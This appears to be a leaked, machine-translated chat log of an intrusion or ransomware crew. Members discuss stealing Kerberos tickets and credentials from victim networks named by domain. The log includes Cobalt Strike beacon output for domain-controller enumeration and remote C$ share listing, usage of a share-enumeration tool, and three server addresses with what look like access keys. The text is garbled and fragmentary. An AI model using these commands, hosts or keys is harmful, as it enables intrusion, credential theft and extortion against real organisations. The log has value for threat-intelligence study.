``Truthfully not yet tested myself)looks interesting, but what is the "poc.exe", is it an exploit or just a tool so that the file will not be deleted? not really understand ithttp://decoder.cloud/2020/10/24/when-ntuser-pol-leads-you-to-system/ but not in 2 we guessed) no new sessions today)mm-hmmm, then continue to work dahdal @tl2 ? and where do we have @user1 and @user3? it's ok)) and @tl2 just re-snap the accessible kerb) how to check it? there are kerbs disconnected accounts yes you get the idea if the kerb LA on the server somewhere there may well be hash admin and so you can try to kerb that will unbroken check on the car from which was kerbdakerby just there?so what's the difference between admin/non-admin in this case, I'll look at the ticketsThey've deleted a lot of admins, and now the kerbs are only on the absent.no kerbs (kerbs only faster @tl2 now I'll change it so it will be better you at least change your ava) it's ok, keep quiet for a minute and he'll see for himself) look who wrote it, never mind the point it does not matter he read and did not understand it and what? well, read it carefully and what did you throw it at me first?[ ](https://mediaeveryonecom/channel/general?msg=4EFEQi79LBrjifoBX) Yeah[ ](https://mediaeveryone.com/channel/general?msg=BhrQCGmk6EgJ9rrLj) 1kerbs will be the same no matter what car they were shot on? Not me)re-shoot and direct to @tl2Need to re-shootYes, the old ones went stale...there is an alternative solution for snpartners, there are yes - but the farm is not there yet (and we have no kerbs at all so the farm will be in 2 weeks anyway kerbs yes no kerbs are you kerbs filmed?we're trying to get the credits YES[ ](https://mediaeveryone.com/channel/general?msg=BDC8RKTmvoJ8CaP9h) :dog:[ ](https://mediaeveryone.com/channel/general?msg=v8ebbs3n7d6WSkYjs) ?as it turns out nothing) (also a joke, don't take it seriously) you know? and today you said "by ten" and then "by two" you said "by ten", and? it's clear, you just said the same) i didn't understand what i wrote
?[ ](https://mediaeveryone.com/channel/general?msg=w5zjzpnoK9RJLRAy5) by two ?
?I have deja vu[ ](https://mediaeveryone.com/channel/general?msg=nkgf4mWcASkFHjag6) it's on the oldbut there will be new ones closer to 10That just came in. Are the new ones coming? or can the chinese come back? while there are no new ones, what are the old ones doing now? on #stanthonyskc-com too on #snpartners-com nothing newHow are the tasks going?:space_invader:helloHow is the progress on the others? the chinese are not back, no new ones... What time do we wrap it up at 6:00? What time tonight?
Sessions is stuck.
Thanks a lot and I've got it... if you use parameter --public-only then it will show only those where user admin[ ](https://mediaeveryone.com/channel/general?msg=2iRoChhq3cHrToCzj) by default 50 like the threads are turned up to max... but that's cool. why is it so monsterrickly fast? no it's not, it'll show the balls and take the list from the adtoot just sharers I think ad is only used with ips?
execute-assembly SharpSharesNG.exe shares ad --alive --output file.txt
```
correct ?ops)``execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt `` ping the fostlist )``
* SharpSharesNG --max-threads 10 --output console|/path/to/file
*
* ips - equiv ips ad
* ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
* ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
* ips HostName [--os-detect] [--alive] [--exec] script\path
* ips [ad] [--os-detect] [--alive] [--exec] script\path
* ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
*
*
* shares - equiv shares ad
* shares 10.0.0.1 [--os-detect] [--public-only]
* shares 10.0.0.1/24 [--os-detect] [--public-only]
* shares HostName [--os-detect] [--public-only]
* shares [ad] [--os-detect] [--public-only]
* shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
``She's, secludes? or just start it and it spits somewhere? is there any argument? @all share please ѕharshareset one and a half pk@user8 with @user3 are preparing which of ?today we close one networkhowever not, there already all in water how is it? if not collects detailed report in confusobirthing nothin, tried three times - not collects work tules panel what, not working?hmchet all the same lostprobuyuje@tl1 reboot my dedikt plz)))) boshyuyaa all so we kolupali so a month in zohocorpinadaworkgroup? and vg is what? meanwhile study the methods of work through vpn in vg20 min then recurse you now without a task?what did you read in the mail? was it my versionoffline backups? understand how you recovered and what you missed?
beacon> shell nltest /dclist:waterway.com
[*] Tasked beacon to run: nltest /dclist:waterway.com
[+] host called home, sent: 58 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
```
```
beacon> shell nltest /dclist:
[*] Tasked beacon to run: nltest /dclist:
[+] host called home, sent: 46 bytes
[+] received output:
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
``You threw the output with fqdn and that's what I threw the output from try to get the DC list from the list /dclist:shell nltets /dclist:yeah, fuck it```
Cannot find DC to get DC list from.Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN
The command completed successfully
``just went to the cheknudomnoy authorization is there? hello2sessions in the water left? all bruhtoff zapatosessione not come to life, bullet? okzaytit went so, and what do you mean by ``works``?[ ](https://mediaeveryone.com/group/corp-televisa-com-mx?msg=8s4fa9XpaArr2fSGh) this works?yeah i mean we're gonna close today for sure, no matter what we found, no we didn't find it, we're gonna bust it so yeah, we tried it, if we don't find any nass codes, fuck it, so you're probably gonna bust it without me, 3 kobos per lock
https://evatip.com
192.254.77.250:50200
zezrvNUA5VicElRQH0F2NvFJmQffkD391v
``````
https://somerd.com
172.93.102.117:40834
Q4H0EEjbHL7KlOZabfBcWTQWMcEM73agjH
``````
https://prorean.com
192.254.76.214:10340
5zYDiYJQI0dLjj4AXTUguzvJhauFWffMgIA
``I'm going to throw the builds in there coba blocked again...
in the main domain `OSDJIGHF&8SYIG*H shell dir \\10.7.6.127\C$
[*] Tasked beacon to run: dir \\10.7.6.127\C$
[+] host called home, sent: 50 bytes
[+] received output:
Volume in drive \10.7.6.127\C$ has no label.
Volume Serial Number is D68F-16CB
Directory of \10.7.6.127$
05/09/2016 11:32 a. m. 1,024 .rnd
05/09/2016 11:57 a. m. 0 2016-09-05_ImportTool.log
30/04/2015 10:27 a. m.